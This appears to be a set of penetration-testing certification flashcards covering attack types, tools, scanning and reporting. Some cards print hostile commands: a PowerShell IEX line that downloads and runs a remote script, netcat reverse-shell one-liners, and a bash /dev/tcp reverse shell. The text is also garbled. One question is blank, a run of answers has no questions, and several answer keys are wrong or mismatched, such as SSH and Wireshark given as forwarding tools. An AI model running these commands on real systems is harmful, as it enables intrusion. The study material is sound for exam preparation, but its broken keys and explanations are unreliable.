Sybex Flashcards

Question 1

Q

Which of the following is a mechanism that can be used to defend against DNS poisoning attacks?

Implement DNSSEC.
Close port 53 in the DNS server’s host firewall.
Disable ICMP forwarding in your router configuration.
Use SSH for DNS queries.

Answer

A

A. One way to defend against DNS poisoning is to implement DNSSEC. DNSSEC signs each DNS request with a digital signature to ensure authenticity. This makes it difficult to insert poisoned records.

Question 2

Q

You are a penetration tester, and you are conducting a test for a new client. You have successfully exploited a DM2 server that seems to be listening to an outbound port. You want to forward that traffic back to a device. What are the best tools to do this? (Choose two.)

A. Cain and Abel
B. Netcat
C. Nmap
D. Secure Shell (SSH)
E. Tcpdump
F. Wireshark

Answer

A

D and F. In this scenario, the best options are SSH and Wireshark. Secure Shell (SSH) provides secure encrypted connections between systems. SSH provides remote shell access via an encrypted connection. SSH is used for secure command-line access to systems, typically via TCP port 22, and is found on devices and systems of all types. Because SSH is so common, testing systems that provide an SSH service is a very attractive option for a penetration tester. Wireshark is a protocol analyzer that allows penetration testers to eavesdrop on and dissect network traffic. Wireshark also allows for capturing network traffic from wireless networks.

Question 3

Q

You are a penetration tester, and you are conducting a test for a new client. The client has asked you to conduct a test on a web application. You discover that the user login process sends form field data by using the HTTP GET method. To reduce the risk of exposing sensitive data, the HTML form should be sent using which method?

A. The HTTP OPTIONS method
B. The HTTP POST method
C. The HTTP PUT method
D. The HTTP TRACE method

Answer

A

B. Forms in HTML can use either method=”POST” or method=”GET” (default) in the element. The method specified determines how form data is submitted to the server. With GET, the parameters remain in the browser history because they become part of the URL. With POST, the parameters are not saved in browser history. GET is less secure compared to POST.

Question 4

Q

Which of the following best describes the term confidentiality within the context of penetration testing?

A. Preventing unauthorized access to information
B. Preventing unauthorized modifications to information
C. Ensuring information remains available for authorized access
D. Preventing legitimate access to information

Answer

A

A. Cybersecurity professionals use the well-known CIA triad model to describe the goals of information security. The letter C in CIA stands for confidentiality, which seeks to prevent unauthorized access to information or systems.

Question 5

Q

Which social engineering technique involves questioning an employee using intimidation to gather information?

Phishing
Smishing
Impersonation
Interrogation

Answer

A

D. Interrogation involves questioning an employee of the target organization, using fear as a motivation to gather information. Interrogation is not a technique that is typically used by penetration testers.

Question 6

Q

A penetration tester is conducting a test on a web application and discovers that the user login process sends FROM field data by using the HTTP GET method. To reduce the risk of exposing sensitive data, the HTML form should be sent by using which of the following?

The HTTP OPTIONS method
The HTTP POST method
The HTTP PUT method
The HTTP TRACE method

Answer

A

B. Forms in HTML can use either method=”POST” or method=”GET” (default) in the element. The method specified determines how form data is submitted to the server. With GET, the parameters remain in the browser history because they become part of the URL. With POST, parameters are not saved in browser history. GET is less secure compared to POST because data sent is part of the URL.

Question 7

Q

An attacker downloads the Low Orbit Ion Cannon from the Internet and then uses it to conduct a denial-of-service attack against a former employer’s website. What kind of attacker is this?

A. Script kiddie
B. Hacktivist
C. Organized crime
D. Nation-state

Answer

A

A. A script kiddie is an individual who carries out an attack using code written by more advanced hackers. A hacktivist’s attacks are usually politically motivated. Organized crime actors are usually a highly organized group of cybercriminals whose main goal is to make a lot of money. A nation-state threat actor acts on behalf of a nation to inflict harm on a rival nation.

Question 8

Q

Which of the following are special network devices that are commonly used to control manufacturing equipment and environmental systems? (Choose two.)

ICS
SCADA
Point of sale
RTOS
IoT

Answer

A

A and B. Industrial control systems (ICSs) and supervisory control and data acquisition (SCADA) are commonly used in factory automation equipment and environmental controls. They tend to run on older operating systems, and their software/firmware tends to be updated very infrequently. This can make such systems more susceptible to security exploits. They are also usually quite fragile, so use caution when scanning them with a vulnerability scanner.

Question 9

Q

You have just met with a new client that has requested that you perform a penetration test for them. The client manages a string of retail storefronts that accept credit cards. They need you to assess whether they are PCI-DSS compliant. Which of the following tests need to be included in the assessment? (Choose two.)

A. Use only hardware certified by Microsoft to be Windows 10–compatible.
B. Encrypt the transmission of cardholder data.
C. Ensure that only one user account is used by all employees to access network resources and cardholder data.
D. Use a NAT router to isolate the cardholder data environment (CDE) from the rest of the network.
E. Remove all default passwords from software and hardware devices.

Answer

A

B and E. The Payment Card Industry Data Security Standard (PCI-DSS) is a set of security controls that businesses are required to implement to protect credit card data. For example, two of the requirements specify that all cardholder data be encrypted before being transmitted on a network medium and that all default passwords be removed from hardware and software deployed.

Question 10

Q

During a penetration test, you discover that your client uses a web application that was developed in-house that stores user passwords as clear text within a MySQL database. What should you recommend?

A. Purchase a commercial application that performs a similar task.
B. Rewrite the application to encrypt passwords before they are saved in the database.
C. Switch to the PostgreSQL database.
D. Switch to a hosted solution with a cloud service provider.

Answer

A

B. Because the application was developed in-house, the client should be able to rewrite the code such that passwords are encrypted by the application before they are saved in the database.

Question 11

Q

Which of the following is an XML-based interface definition language used to describe the functionality offered by a Simple Object Access Protocol (SOAP) server?

A. Web Service Description Language (WSDL)
B. Web Application Description Language (WADL)
C. Representational State Transfer (REST)
D. Swagger

Answer

A

A. The Web Service Description Language (WSDL) is an XML-based interface definition language that is used to describe the functionality offered by a web application server, such as a SOAP server. WSDL doesn’t work well with the Representational State Transfer (REST) web application architecture, which has been slowly replacing SOAP over the years.

Question 12

Q

Which of the following tools can be used to automatically run tasks on a Windows system without your intervention? (Choose two.)

WMI
at
Task Scheduler
PS remoting
cron

Answer

A

B and C. In the graphical environment, you can use Task Scheduler to automatically run tasks (such as exploits executables or services) without your intervention. You can also use the at command from the command prompt to accomplish the same thing.

Question 13

Q

Which of the following terms refers to the process of gathering data produced by the various tools in a penetration test and formatting the data in a consistent manner such that it can be easily read?

A. Attestation of findings
B. Normalization of data
C. Remediation
D. Disposition of reports

Answer

A

B. When you normalize the data from a penetration test, you aggregate all the data generated by all of the different tools and processes you used during the test and format it such that it is consistent and easy to understand.

Question 14

Q

A security analyst is planning on using black box penetration testing. This type of strategy will provide the tester with which of the following?

A. Privileged credentials
B. A network diagram
C. Source code
D. Nothing; they must do their own discovery.

Answer

A

D. Black box tests, sometimes called zero knowledge tests, are intended to replicate what an attacker would encounter. Testers are not provided with access to or information about an environment, and instead, they must gather information, discover vulnerabilities, and make their way through an infrastructure or systems as an attacker would.

Question 15

Q

You and a colleague are discussing a scenario of an organization implementing email content filtering to block inbound messages that appear to come from internal sources without proper authentication. They also might filter out any messages that contain high-risk keywords or appear to be coming from known malicious sources. What common category of remediation activity would this fall under?

A. Measurement
B. People
C. Process
D. Technology

Answer

A

D. In this scenario, you are discussing technology. Technological controls also provide effective defenses against many security threats. There are three major categories of remediation activities. The categories are people, process, and technology.

Question 16

Q

Which of the following is a service that runs on a Windows system and enforces the security policy of the system?

LSASS
Key distribution center (KDC)
Group Policy Object (GPO)
LDAP

Answer

A

A. The Local Security Authority Subsystem Service (LSASS) is a process that runs on a Windows system to enforce the security policy on the system. It verifies users that log on to the system, manages user password changes, creates access tokens, and makes entries to the Security log.

Question 17

Q

You’ve heard that a new physical security exploit is going around where the attacker uses a special type of key called a bump key. Which open source research source would most likely contain information about how this exploit works?

CAPEC
Full Disclosure
NVD
CVE

Answer

A

A. The CAPEC database contains information about known attack patterns used to exploit weaknesses, including physical security vulnerabilities.

Question 18

Q

You are a penetration tester, and you are conducting a test for a new client. You are looking to start a session hijacking attack against your client’s web application. What information is important to obtain to ensure that your attack will be a success?

A. A session cookie
B. A session ticket
C. A username
D. A user password

Answer

A

A. Websites use HTTP cookies to keep sessions over time. If a tester is able to get a copy of the user’s session cookie, then they can use that cookie to impersonate the user’s browser and hijack the authenticated session. Attackers who are able to acquire the session cookie used to authenticate a user’s web session can hijack that session and take charge of the user’s account. Cookies used for authentication should always be securely created and transmitted only over secure, encrypted communications channels.

Question 19

Q

You’re prioritizing vulnerabilities discovered during a vulnerability scan. One vulnerability you found has a Common Vulnerability Scoring System (CVSS) score of 10. To which risk category does this vulnerability belong?

Low
Medium
High
Critical

Answer

A

D. Any CVSS score of 10.0 or higher is considered to be in the Critical Risk category. Therefore, a CVSS score of 10 indicates that this is a critical vulnerability.

Question 20

Q

You own a small penetration testing consulting firm. You are worried that a client who requests a black box assessment may sue you after penetration testing is complete if their network is compromised by an exploit. What should you do?

A. Insist that clients sign a purchase order prior to the test.
B. Insist that clients sign a master services agreement (MSA) prior to the test.
C. Include a disclaimer in the agreement indicating that the test methodology can impact the comprehensiveness of the test.
D. Refuse to perform black box tests.

Answer

A

C. The testing agreement or scope documentation should contain a disclaimer explaining that the scope and methodology requested by the client can impact the comprehensiveness of the test. For example, a white box test is more likely to discover hidden vulnerabilities than a black box test can. A purchase order is a binding agreement to purchase goods or services. An MSA is an agreement that defines terms that will govern future agreements. Black box tests can provide a unique perspective and should not be forsaken.

Question 21

Q

You are a penetration tester, and you are conducting a penetration test for a new client. You are looking to cross-compile code for your penetration activity, and then you plan to deploy it. Why would you plan to cross-compile code?

A. To add additional libraries
B. To allow you to inspect the source code
C. To run it on multiple platforms
D. To run it on different architectures

Answer

A

D. Cross-compiling code is used when a target platform is on a different architecture. The tester may not have access to a compiler on the target machine or may need to compile the code for an exploit from the primary workstation, which is not the same architecture as the target.

Question 22

Q

Which of the following is a contract where both parties agree to most of the terms that will govern future agreements?

A. Master service agreement (MSA)
B. Nondisclosure agreement (NDA)
C. Statement of work (SOW)
D. Purchase order (PO)

Answer

A

A. A master service agreement (MSA) is a contract where both parties agree to most of the terms that will govern future agreements. By defining these terms in an MSA, future agreements are much easier and faster to make. A purchase order is a binding agreement to make a purchase from a vendor. A SOW is a formal document that defines the scope of a penetration test. An NDA specifies what each party in an agreement is allowed to disclose to third parties.

Question 23

Q

Which open source research source is published by the organization that produces the nmap utility?

CERT
Full Disclosure
CVE
NVD

Answer

A

B. Full Disclosure is an open source research source that is published by the same organization that produces the nmap utility. It can be accessed at www.seclists.org/fulldisclosure.

Question 24

Q

You are a penetration tester, and you are conducting a test for a new client. You have been asked to assess your client’s physical security by gaining access into the corporate office. You are looking for a method that will allow you to enter the building during both business hours and after hours. What would be the most effective method for you to attempt?

A. Attempt badge cloning.
B. Attempt lock picking.
C. Attempt a lock bypass.
D. Attempt piggybacking.

Answer

A

A. With badge cloning, the tester can clone the badge of a staff member to gain entry into the facility. One of the most common techniques is to clone radio-frequency identification (RFID) tags. Given this scenario of trying to obtain access both during business hours and after hours, badge cloning is the best option.

Question 25

Q

You have just concluded a penetration test for a client. In your findings, you report that a web application that was developed in-house and that the organization uses to manage customer orders is susceptible to SQL injection attacks. What should you recommend the client do to remediate this?

A. Escape data.
B. Implement SSL for network communications.
C. Require 2FA when authenticating users.
D. Salt the hash.

Answer

A

A. In this scenario, you could recommend that the application be rewritten such that data is escaped. Escaping is the process of securing data by stripping out unwanted information, such as malformed HTML or script tags. This prevents data from being seen as code. Escaping data helps secure information prior to rendering it for the end user and helps prevent SQL injection as well as cross-site scripting attacks.

Question 26

Q

You are a penetration tester and are discussing with a client the properties of the testing engagement agreement. Which one of the following will have the biggest impact on the observation and testing of the client’s production systems during their peak loads?

Creating a scope of the critical production systems used by the client
Establishing a white box testing engagement with the client
Having the client’s management team sign off on any invasive testing
Setting up a schedule of testing times to access their systems

Answer

A

D. The timeline for the engagement and when testing can be conducted will have the biggest impact on the observation and testing of the client’s systems during peak hours. Some assessments will be scheduled for noncritical time frames to minimize the impact of any potential outages, while others may be scheduled during normal business hours to help test the organization’s reaction to attacks.

Question 27

Q

In terms of multifactor authentication, which of the following is an example of somewhere you are?

A. Security token generator
B. Passphrase
C. Hardwire connection to the organization’s internal LAN
D. Voiceprint

Answer

A

C. A hardwire connection to an organization’s internal LAN is an example of somewhere you are. Authentication may or may not be allowed based on this factor.

Question 28

Q

As a part of a penetration test, you need to perform reconnaissance on the target organization to passively gather information. Which tools could you use to do this? (Choose two.)

A. whois
B. Metasploit Framework
C. OpenVAS
D. nslookup
E. Nessus

Answer

A

A and D. The whois and nslookup utilities can be used to passively conduct reconnaissance on the target organization. Because they report information that is available to the general public, using these tools is highly unlikely to arouse any suspicion.

Question 29

Q

Which port is used by the SNMP protocol?

UDP 161
TCP 23
TCP 389
UDP 88

Answer

A

A. The SNMP protocol runs on UDP port 161.

Question 30

Q

During a penetration test, the tester gains physical access to a Windows server system and reboots it from a flash drive that has a Linux distribution installed on it. She is able to bypass security and copy key files from the server to the flash drive for later cracking and analysis. What type of exploit occurred in this scenario?

Cold boot attack
Shell upgrade exploit
VM escape exploit
JTAG debug exploit

Answer

A

A. The tester implemented a cold boot attack. By booting to Linux from the flash drive, she was able to bypass many of the Windows security mechanisms and access key files.

Question 31

Q

The network administrator for an organization that is the target of a penetration test configured her network firewall with an administrative username of admin and a password of password. Which authentication exploit is this device vulnerable to?

Weak credentials exploit
Redirect attack
Session hijacking
Kerberos exploit

Answer

A

A. This device is vulnerable to a weak credentials exploit because the administrative username and password are easy to guess.

Question 32

Q

A penetration tester is using PowerShell to conduct testing. The tester is using the following PowerShell command:

powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/script.ps1”);Invoke-Command

What action is being performed by this command?

A. It executes a remote script.
B. It incorporates an object.
C. It runs an encoded command.
D. It sets the execution policy.

Answer

A

A. In this scenario, the PowerShell command given will execute a remote script. By using the PowerShell IEX command, it will invoke an expression. The IEX cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command. The PowerShell Invoke-Command cmdlet runs commands on a local or remote computer and returns all output from the commands, including errors. By using a single Invoke-Command command, you can run commands on multiple computers.

Question 33

Q

You are a penetration tester, and you have heard about an attacker who carried out an attack against a government contractor in a neighboring country. The goal of the attack was to gain access through the contractor to the opposing country’s government network infrastructure. The attacker is being backed by the attacker’s own government. What type of threat actor is being described in this scenario?

A. Hacktivist
B. Nation state
C. Organized crime
D. Script kiddie

Answer

A

B. A nation state threat actor has been given the “go ahead” to hack. They work for a government to disrupt or compromise target governments, organizations, or individuals to gain access to valuable data or intelligence and can create incidents that have international significance. A script kiddie is an individual who carries out an attack using code written by more advanced hackers. A hacktivist usually attacks targets to make a political statement. An organized crime threat actor is a group of cybercriminals whose goal is financial gain.

Question 34

Q

Which of the following can be used to perform brute-force password attacks? (Choose two.)

A. Empire
B. Patator
C. Powersploit
D. Aircrack-ng
E. APK Studio

Answer

A

B and D. Both Patator and Aircrack-ng utilities can be used to conduct brute-force password attacks. Patator can be used to compromise a variety of network services, such as FTP, SNMP, and SSH servers. Aircrack-ng is used to brute-force wireless networks.

Question 35

Q

An attacker carries out an attack against a government contractor in a neighboring country, with the goal of gaining access through the contractor to the rival country’s governmental network infrastructure. The government of the attacker’s own country is directing and funding the attack. What type of threat actor is this?

A. Script kiddie
B. Hacktivist
C. Organized crime
D. Nation-state

Answer

A

D. A state-sponsored attacker usually operates under the direction of a government agency. The attacks are usually aimed at government contractors or even the government systems themselves. A script kiddie is an individual who carries out an attack using code written by more advanced hackers. A hacktivist’s attacks are usually politically motivated. An organized crime threat actor is a group of cybercriminals whose main goal is financial gain.

Question 36

Q

You are a penetration tester, and you want to use nmap to scan a remote system. You will be using the following command:

nmap 142.78.32.0/24

How many TCP ports will you be scanning?

A. 256
B. 1,000
C. 1,024
D. 65,535

Answer

A

B. Using nmap’s basic functionality is quite simple. Port scanning a system just requires that nmap is installed and that you provide the target system’s hostname or IP address. By default, nmap scans the 1,000 most common ports for both TCP and UDP. However, the full range of ports available to both TCP and UDP services is 1–65,535.

Question 37

Q

A penetration tester is conducting a scan of a web application. During the review of the scan results, which of the following vulnerabilities would be the most critical and should be prioritized for exploitation?

Clickjacking
Expired certificate
Fill path disclosure
Stored cross-site scripting (XSS)

Answer

A

D. Stored cross-site scripting (XSS) is the most dangerous type of cross-site scripting. Web applications that allow users to store data are potentially exposed to this type of attack. Stored XSS occurs when a web application gathers input from a user which might be malicious and then stores that input in a data store for later use

Question 38

Q

Consider the following image:

Which nmap command could have been used to generate this output?

A. nmap 10.0.0.1
B. nmap 10.0.0.1 -sS
C. nmap 10.0.0.1 -sU
D. nmap 10.0.0.1 -sT

Answer

A

C. In this example, the nmap utility was used to run a UDP scan. The nmap 10.0.0.1 –sU command can be used to run this kind of scan. Note that the output of the command looks almost identical to the output of a TCP SYN scan; however, it lists UDP ports instead of TCP ports.

Question 39

Q

You are a penetration tester, and you are configuring your vulnerability management solution to perform credentialed scans of servers on your client’s network. What type of account should you be provided with?

A. A domain administrator account
B. A local administrator account
C. A domain guest account
D. A read-only account

Answer

A

D. Credentialed scans require read-only access to target servers. The client should follow the principle of least privilege and limit the access available to the tester. You should consider asking for a specific “audit” account to be created with similar read-only access. A dedicated “audit” account has the advantage of showing up in the logs and instantly being recognized by everyone in IT as a potentially approved activity.

Question 40

Q

Which utility is used to conduct social engineering exploits?

A. Responder
B. SET
C. APKX
D. Immunity debugger
E. Hopper

Answer

A

B. The Social Engineer Toolkit (SET) is an open source penetration testing utility designed to conduct social engineering exploits.

Question 41

Q

You are assessing the results of a vulnerability scan and have made an observation. You have found that the organization has many Linux servers deployed that still run on a distribution that was released in 2008. What should you do?

Map vulnerabilities present in the older Linux servers to possible exploits.
Halt the penetration test and inform the client immediately.
Recommend that the client upgrade the servers in an email.
Upgrade the servers for your client.

Answer

A

A. The first response to your observation of outdated servers would to be to investigate whether this creates any vulnerabilities that you could exploit later in your penetration test. Then, you should recommend that the client upgrade their server in your final report.

Question 42

Q

You’re prioritizing vulnerabilities discovered during a vulnerability scan. One vulnerability you found has a Common Vulnerability Scoring System (CVSS) score of 3.8. To which risk category does this vulnerability belong?

Low
Medium
High
Critical

Answer

A

A. Any CVSS score less than 4.0 is considered to be in the Low Risk category. Therefore, a CVSS score of 3.8 indicates that this is a low-risk vulnerability.

Question 43

Q

During a gray box penetration test, you discover an open SMTP service running on an older database server. You want to use this SMTP service to send phishing emails to users within the organization. What is this exploit called?

Distributed denial of service
SMTP relay
Fraggle
Teardrop

Answer

A

B. Leveraging an open SMTP service to send unauthorized email messages is called SMTP relay. Most new systems have provisions in place to prevent this from happening, but many older server systems do not.

Question 44

Q

Consider the following snippet from a script:

If (x -eq 2) {
‘This number is 2’
} Else {
‘This number is not 2’
}

What scripting language is this snippet written in?

A. Ruby
B. PowerShell
C. Bash
D. Python

Answer

A

B. An if/then flow control structure in PowerShell uses the following syntax:
- if condition {
- commands…
- } Else {
- commands…
- }

Question 45

Q

A penetration tester has completed a simple compliance scan of a client’s network. The results indicate that there is a subset of assets on a network. This information differs from what was shown on the network architecture diagram that was given to the tester prior to testing. What is most likely the cause for the discrepancy? (Choose two.)

A misconfigured DHCP server
Incorrect credentials
Limited network access
Network access controls (NAC)
Storage access

Answer

A

C and E. Compliance scanning focuses on the configuration settings or the security hardening that is being applied to a system. When a compliance scan is performed against a single computing system, it produces a report that defines how well the system is hardened against the selected compliance framework. Compliance scans are not designed to locate vulnerabilities in software applications or operating systems but are designed to locate and assess vulnerabilities in system hardening configurations. In this scenario, since you are seeing more assets on the network than what was provided in the network architecture, you can attribute that to having limited network access or storage access.

Question 46

Q

You are generating a written report of findings after a penetration test. In which section should you report risk ratings?

A. Executive summary
B. Methodology
C. Findings and remediation
D. Metrics and measures
E. Conclusion

Answer

A

D. When creating your written report of findings after completing a penetration test, you should report your risk ratings in the Metrics and Measures section. These ratings allow the reader to prioritize risks as well as make comparisons between penetration tests conducted over time.

Question 47

Q

Question 48

Q

A tester has captured NTLM hashes and wants to conduct a pass-the-hash attack. Unfortunately, the tester doesn’t know which systems on the network may accept the hash. What tool should the tester use to conduct the test?

A. Drozer
B. Hashcat
C. Hydra
D. Kismet

Answer

A

C. Hydra is designed to include support for NTLM hashes as a password. Hashcat is a password cracking and recovery tool. Drozer is a framework for Android security assessments. Kismet is an 802.11 layer 2 wireless network detector, sniffer, and intrusion detection system. Hydra, often known as thc-hydra, is a brute-force dictionary attack tool that is designed to work against a variety of protocols and services.

Question 49

Q

You have just completed scanning a target network and are now prioritizing activities in preparation to exploit the vulnerabilities found. The system you want to target can’t be compromised with a single exploit. However, you determine that you can use multiple exploits in conjunction with each other to compromise the system. The first one gets through the system’s host-based firewall. The second exploits a user account with weak password. The third elevates privileges on the system. What is your solution called?

Deception
Exploit modification
Exploit chaining
Credential brute-forcing
Proof-of-concept development

Answer

A

C. In this scenario, you linked several exploits together to compromise the target system. This is called exploit chaining.

Question 50

Q

Which Linux special permission, when assigned to a directory, prevents users from deleting files they do not own, even if they have write and execute permissions to the directory?

SGID
SUID
Sticky bit
Ret2libc

Answer

A

C. When the sticky bit permission is assigned to a directory on a Linux system, then users can delete files only within the directory for which they are the owner, even if they have write and execute permissions to that directory.

Question 51

Q

Which of the following Windows Group Policy settings determines how long a user can keep the same password before being required to change it to a new one?

A. Enforce password history
B. Minimum password length
C. Minimum password age
D. Maximum password age

Answer

A

D. The “Maximum password age” Group Policy setting determines how long a user can keep the same password before being required to change it to a new one. Once that time period has elapsed, the user is forced to create a new password.

Question 52

Q

You are a penetration tester, and you are conducting a test for a new client. During a gray box penetration test you want to be able to set up a bind shell exploit where a listener is set up on a compromised system on the client’s network. Which remote access tools can you use to do this? (Choose two.)

A. Empire
B. Ncat
C. Netcat
D. Powersploit
E. Searchsploit

Answer

A

B and C. Netcat is an open source network debugging and exploration utility that can read and write data across network connections, using the TCP/IP protocol. Netcat is also a popular remote access tool, and it has a small footprint that makes it easily portable to many systems during a penetration test. Setting up a reverse shell with netcat on Linux looks like this: nc [IP of remote system] [port] -e /bin/sh
- Setting up a reverse shell with netcat on Windows looks like this: nc [IP of remote system] [port] -e cmd.exe
- It is also fairly easy to set up netcat as a listener by using this: nc -l -p [port]
- Ncat is designed as a successor to Netcat and has the same functionality including a variety of additional capabilities, including using SSL, proxies, and tricks such as sending email or chaining Ncat sessions together as part of a chain to allow pivoting.

Question 53

Q

You are performing a gray box penetration test. You want to craft a custom packet to test how a server responds and to see what information it responds with. Which utility could you use to do this?

hping
ping
nmap
Wireshark

Answer

A

A. The hping utility is a tool commonly used by penetration testers for packet crafting. It allows you to make almost any kind of packet you want and send it to a designated host on the target network. Analyzing how the host responds can provide you with valuable information for the next phase of the penetration test.

Question 54

Q

During the information gathering phase of a black box penetration test, you need to eavesdrop on radio frequency emissions emanating from the target’s facility and attempt to capture data from its wireless network. You are parked in the organization’s parking lot. You want to use aircrack-ng to crack the encryption used by the Wi-Fi network. To accomplish this, you first need to capture the authentication handshake. Which utility should you run on your laptop to do this?

airodump-ng
aireplay-ng
aircrack-ng
nmap

Answer

A

A. Before Aircrack-ng can be used to crack the encryption on a wireless network, you must first run the airodump-ng utility on the specific channel used by the transmitting access point to collect the authentication handshake.

Question 55

Q

You are a penetration tester, and you have been asked by a client to perform a code review of their web application. What type of analysis will you be performing?

A. Dynamic code analysis
B. Fuzzing
C. Fault injection
D. Static code analysis

Answer

A

D. Code testing is often done using static or dynamic code analysis along with testing methods such as fuzzing and fault injection. Once changes are made to the code and it is deployed, it must be retested to ensure that the changes didn’t create any new security issues. Since you are only reviewing the code in this scenario, you will be conducting a static code analysis. Static code analysis, also known as source code analysis, is done by reviewing the code of an application. Since static analysis uses the source code, it can be seen as a type of white box testing with full visibility. This can allow testers to find problems that other tests might fail to spot.

Question 56

Q

You are performing reconnaissance as part of a gray box penetration test. You run a vulnerability scan on one of the target organization’s servers and discover that port 143 is open. What does this indicate?

It is an LDAP server.
It is a POP3 email server.
It is an SSH server.
It is an IMAP email server.

Answer

A

D. The default port used by the IMAP service is 143. The IMAP protocol is used by email servers to transfer messages between the mail server and mail clients.

Question 57

Q

You are the CIO for a mid-sized corporation. You are putting together a plan to implement regular penetration tests and are considering using an internal penetration testing team consisting of your own employees. Which of the following are benefits of using an internal team? (Choose two.)

A. They have contextual knowledge of the organization.
B. They are less biased than an external contractor.
C. They have the independence required to perform a thorough test.
D. They have in-depth experience performing penetration tests for many organizations.
E. It’s usually less expensive than using an external contractor.

Answer

A

A and E. There are two major benefits of using internal teams to conduct penetration tests. First, they have contextual knowledge of the organization that can improve the effectiveness of the tests. Second, it’s usually less expensive to conduct testing using internal employees than it is to hire a penetration testing contractor. When the internal staff isn’t involved in a penetration test, they can work on other projects for the organization.

Question 58

Q

You are a performance tester, and you are discussing performing compliance-based assessments for a client. Which is an important key consideration?

A. Any additional rates
B. Any company policies
C. The industry type
D. The impact tolerance

Answer

A

A. Budgeting is a key factor of the business process of penetration testing. A budget is required to complete a penetration test and is determined by the scope of the test and the rules of engagement. For internal penetration testers, a budget may just involve the allotted time for the team to perform testing. For external testers, a budget usually starts with the estimated number of hours based on the intricacy of the testing, the size of the team, and any associated costs.

Question 59

Q

You are performing a black box penetration test for a small organization that wholesales imported electronic devices in the United States. You have used reconnaissance techniques to identify a receptionist’s phone number as well as the organization’s printer vendor. You call this receptionist, pretending to be a sales rep from the vendor. You ask the receptionist for information about their printers, workstations, operating systems, and so on, to learn more about the organization’s network infrastructure. What kind of exploit did you use in this scenario?

Smishing
Vishing
Spear phishing
Whaling

Answer

A

B. A voice phishing attack (also called a vishing attack) was used in this scenario. A vishing attack leverages a telephone call instead of email to conduct a phishing exploit. Essentially, the attacker calls a particular employee pretending to be someone else in order to get information.

Question 60

Q

You are a penetration tester, and you have just completed a simple compliance scan of your client’s network. The results indicate that there is a subset of assets on a network. This information differs from what was shown on the network architecture diagram that you were given prior to testing. What is most likely the cause for the discrepancy? (Choose two.)

A. A misconfigured DHCP server
B. Incorrect credentials
C. Limited network access
D. Network access controls (NAC)
E. Storage access

Answer

A

C and E. Compliance scanning focuses on the configuration settings or the security hardening that is being applied to a system. When a compliance scan is performed against a single computing system, it produces a report that defines how well the system is hardened against the selected compliance framework. Compliance scans are not designed to locate vulnerabilities in software applications or operating systems but are designed to locate and assess vulnerabilities in system hardening configurations. In this scenario, since you are seeing more assets on the network than what was provided in the network architecture, you can attribute that to having limited network access or storage access.

Question 61

Q

Which of the following application scanning techniques is performed by sending random, unexpected, or invalid data to the inputs of an application to see how it responds?

Static code analysis
Fuzzing
Source code analysis
None of the above

Answer

A

B. Fuzz testing involves sending random, unexpected, or invalid data to the inputs of an application to test how it handles that data. This is called exception handling. Many attacks can be deployed that exploit an application’s inability to properly handle unexpected data.

Question 62

Q

Which of the following methods is commonly used to harden Linux-based server systems?

A. Enable the Telnet service.
B. Enable the secure shell (SSH) service.
C. Configure the IP protocol to respond to network broadcasts.
D. Enable user accounts with empty passwords.

Answer

A

B. To harden a Linux-based server system, you should make sure you use SSH instead of Telnet for remote access to the system. SSH encrypts all network traffic between the SSH server and the SSH client. Telnet, on the other hand, transmits all data as clear text, including authentication credentials.

Question 63

Q

A team of testers is conducting an assessment for an organization. The team is not concerned with assessing a broad range of vulnerabilities. Instead, they are conducting a coordinated attack governed by very narrow objectives. The rules of engagement specify that they can use physical, electronic, and social exploits to achieve their objective. What kind of penetration test is happening in this scenario?

A. Compliance-based penetration test
B. White box penetration test
C. Gray box penetration test
D. Black box penetration test
E. Red team penetration test

Answer

A

E. In this scenario, a red team penetration test is being conducted. A red team assessment usually has narrow objectives, rather than trying to comprehensively identify and test all possible vulnerabilities. A red team assessment may use a coordinated attack coming from many different vectors to achieve those objectives. The team may be allowed to use a wide variety of tools and techniques to accomplish this, including technological, physical, and social exploits.

Question 64

Q

Which wireless encryption key cracking exploit involves extracting a small amount of keying material from captured wireless packets and then sending ARP frames to the access point?

Repeating attack
Downgrade attack
Deauth attack
Fragmentation attack

Answer

A

D. In a fragmentation wireless attack, a small amount of keying material is extracted from a captured packet. Then, an ARP packet is sent with known content to the access point. If the packet is echoed back by the AP, then even more keying information can be obtained from the returned packet. If this process is repeated over and over, the entire wireless key can be exposed.

Answer 64

A

A. In this example, the nmap utility was used to run a TCP ACK port scan. The nmap 10.0.0.1 –sA command can be used to run this kind of scan.

Answer 65

A

B. The risk associated with enabled serial console connections on network devices is the fact that network administrators tend to not secure them properly. Because they can be accessed only with a direct point-to-point connection, they don’t configure them to require authentication. Using impersonation, this makes it easy for a penetration tester to access the device, as long as they can get physical access to it.

Answer 66

A

B. A Computer Emergency Response Team (CERT) focuses on security breach and denial-of-service incidents, providing alerts and incident-handling and avoidance guidelines. CERT also conducts an ongoing public awareness campaign and engages in research aimed at improving security systems.

Answer 67

A

B. Before you can capture packets on a wired network, your network interface must be configured to run in promiscuous mode. Otherwise, it will discard all frames it receives that are not addressed specifically to its address.

Answer 68

A

A and C. After a penetration test, it is imperative that you undo everything you have done to your client’s network. So, if you have created any shells, they need to be removed. It is also important to document everything you’ve done while conducting the testing. That way, you don’t accidentally forget something. The goal is to put everything the way it was prior to your testing.

Answer 69

A

A. Much like Shodan, Censys is a security-oriented search engine. When you dig into a host in Censys, you will also discover geoIP information, if it is available, and a comprehensive summary of the services the host exposes providing more detailed information. GeoIP refers to the method of locating a computer terminal’s geographic location by identifying that terminal’s IP address.

Answer 70

A

C. On Linux system, the Ret2libc exploit causes the return address of a subroutine to be replaced by the address of a subroutine that is already present in a processes’ memory.

Answer 71

A

A. A reverse shell opens a communication channel on a port and waits for incoming connections. The client’s machine acts as a server and initiates a connection to the tester’s machine. This is what is done by using the following:
- bash -i >& /dev/tcp//443 0>&1
- Given the options, A is the best option. B and C will not work because they are using the and not the . Option D is not correct because it is using the improper syntax.

Answer 72

A

C. Lock bypass is simply that: bypassing locks without picking them. In this scenario, the tester is attempting a physical security assessment with the use of an under-the-door tool, which goes underneath a door and pulls open a door handle from the inside.

Answer 73

A

C. A master services agreement (MSA) sets the overall provisions between two organizations. Many organizations also create an MSA that defines the terms that the organizations will use for work to be done in the future. This makes ongoing engagements and contracts much easier to work through. This can help organizations prevent the need to renegotiate. MSAs are common when organizations anticipate working together over a period of time or when a support agreement is created.

Answer 74

A

C. In this scenario, it would be important to put the risk tolerance of the client’s organization into the executive summary. Risk tolerance is basically how much risk an organization is willing to take on where their investments are concerned. With any type of investment, there is always risk, but how much risk one is able to withstand is their risk tolerance. This may be different for every organization. You cannot put a set value on risk tolerance.

Answer 75

A

